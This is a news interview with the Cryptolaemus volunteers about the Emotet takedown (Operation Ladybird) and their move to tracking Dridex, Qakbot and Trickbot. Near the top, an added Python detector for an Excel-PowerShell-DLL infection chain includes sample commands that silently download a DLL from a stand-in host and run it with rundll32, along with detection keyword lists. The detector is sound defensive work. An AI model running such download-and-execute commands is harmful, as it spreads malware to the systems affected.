The zip attachment contains an xls file, which starts a PowerShell script that contacts various URLs and downloads the DLL, activating the malware infection chain.
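As an added example (not code from the article or from Cryptolaemus), here is a small detector for the process chain the caption describes, an Office spreadsheet launching PowerShell that reaches out to a URL and then runs a DLL, applied to constructed endpoint process-creation events; the event field names and host names are assumptions.

```python
# Added example, not code from the article or from Cryptolaemus: a detector for
# the infection chain the caption describes (xls -> PowerShell -> URL fetch -> DLL),
# run over constructed process-creation events. Field names are assumptions.

OFFICE_IMAGES = {"excel.exe", "winword.exe"}
URL_MARKERS = ("http://", "https://", "downloadfile", "downloadstring", "invoke-webrequest")
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}


def classify(event):
    """Tag a single event with the chain stage it matches, or None."""
    parent, image = event["parent"].lower(), event["image"].lower()
    cmd = event["cmdline"].lower()
    if parent in OFFICE_IMAGES and image == "powershell.exe":
        # Stage 1: the spreadsheet launched PowerShell; reaching out to a URL is the key tell
        return "office_ps_download" if any(m in cmd for m in URL_MARKERS) else "office_ps"
    if parent == "powershell.exe" and image in DLL_LOADERS and ".dll" in cmd:
        return "ps_dll_load"          # Stage 2: the downloaded DLL is executed
    return None


def detect_chain(events):
    """Return hosts where a stage-1 PowerShell (with URL) parented a stage-2 DLL loader."""
    stage1 = {}   # (host, pid) of PowerShell processes spawned by Office with a URL
    hits = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        tag = classify(ev)
        if tag == "office_ps_download":
            stage1[(ev["host"], ev["pid"])] = ev
        elif tag == "ps_dll_load" and (ev["host"], ev["ppid"]) in stage1:
            hits.add(ev["host"])
    return sorted(hits)


# Constructed sample telemetry (not real data): ws01 shows the full chain,
# ws02 is a benign admin script, ws03 stops after the download stage.
SAMPLE_EVENTS = [
    {"ts": 1, "host": "ws01", "pid": 1200, "ppid": 1000, "parent": "EXCEL.EXE",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden DownloadFile http://example.invalid/p.dll"},
    {"ts": 2, "host": "ws01", "pid": 1300, "ppid": 1200, "parent": "powershell.exe",
     "image": "rundll32.exe", "cmdline": "rundll32.exe C:\\Users\\Public\\p.dll,EntryPoint"},
    {"ts": 3, "host": "ws02", "pid": 2200, "ppid": 2000, "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ts": 4, "host": "ws03", "pid": 3200, "ppid": 3000, "parent": "EXCEL.EXE",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest https://example.invalid/a.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], classify(ev))
    print("full chain on:", detect_chain(SAMPLE_EVENTS))   # ['ws01']
```

The partial match on ws03 is still worth an alert of its own; the parent-child linkage is only what raises the full chain to high confidence.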
Cryptolaemus now targets Dridex, Qakbot and Trickbot. The cybersecurity group made a major contribution to defeating the cybercrime Emotet gang, recognized as Operation Ladybird.
Cryptolaemus, the well-known cybersecurity group that contributed to defeating the cybercrime Emotet gang, now targets Dridex, Qakbot and Trickbot. The members confirmed this, adding however that the “old” enemy may not be dead, so they also continue to monitor its evolution. “The botnets were dismantled from the top down where possible,” they explained to Defense and Security. “This means that all tiers of the botnets were controlled by the law enforcement teams and this is how they were getting the updates of the friendly DLL out to all infected bots rendering them also benign. That operation was very impressive to see on a global scale with such cooperation and coordination on all levels of different levels. Truly honored they named it Operation Ladybird! As for if Emotet will come back, this is always a risk but it seems like this takedown was pretty in depth/comprehensive”.
However, the “old” enemy is not dead
However, the Cryptolaemus team is “always watching for Ivan and his family though and there is no doubt it will come back or someone else in the crimeware world will come to fill the need for mass distro for that crime ecosystem. Unfortunately, this seems to be how things work so there will always be a need for researchers to be there to fight at least until the geopolitical situation in Russia changes where criminals are not thriving there. One of our members was mentioning that we should look at it this way on the story of Emotet, ‘where did WE succeed?’. This is very on target with what most of the community is thinking lately. What can we do to make this last as a model for the next battle? We need to reproduce this grass roots effort to fight all the major botnets and have this type of success again and again.”
Who are the “mealybug destroyers”, the Cryptolaemus members
But who are the Cryptolaemus members, and why did they declare war on the malware? “Cryptolaemus was founded in early 2018 as a Twitter chat group between half a dozen people to share intel on the latest Emotet campaigns and work closer together,” the cybersecurity experts explained. “We felt with all of the tracking we were doing individually that we could be that much better pooling our efforts and sharing the kudos as a team. Since that time, it has evolved into a group of over 24 volunteers spanning many time zones all over the globe. The name comes from the scientific name of a beetle from Australia that is known as the ‘mealybug destroyer’. Symantec had named the actor behind Emotet as “mealybug” and we thought that was a funny name so we became the mealybug destroyers. 🙂 We vote on new members and even have begun to make old members that have moved onto other projects honored as Emeritus status. Some of our members work in Infosec and others work in related fields but have a passion for fighting malware.”
The cybersecurity experts are all volunteers and are not compensated directly for their work against cybercrime
“We are all volunteers and are not compensated directly for our work on Emotet,” Cryptolaemus underlined. “We are very grateful for the community’s support and the support of many corporate sponsors. Our goals are to give everyone free and accurate news on Emotet and IoCs to protect themselves. We seek to make everyone aware of the threat that Emotet is and slow down or stymie the growth of the botnets. We feel we have been able to accomplish these goals but Ivan is always trying to get a step ahead so he keeps us on our toes. We all enjoy the fight though and we love to help others so this is why we keep going on as long as the community finds our work valuable. We also have tried to become a focal point on Emotet and consolidate intel to share with the industry and law enforcement. We feel the attention we have received from our efforts proves that we have been successful and performed a valuable service to society!”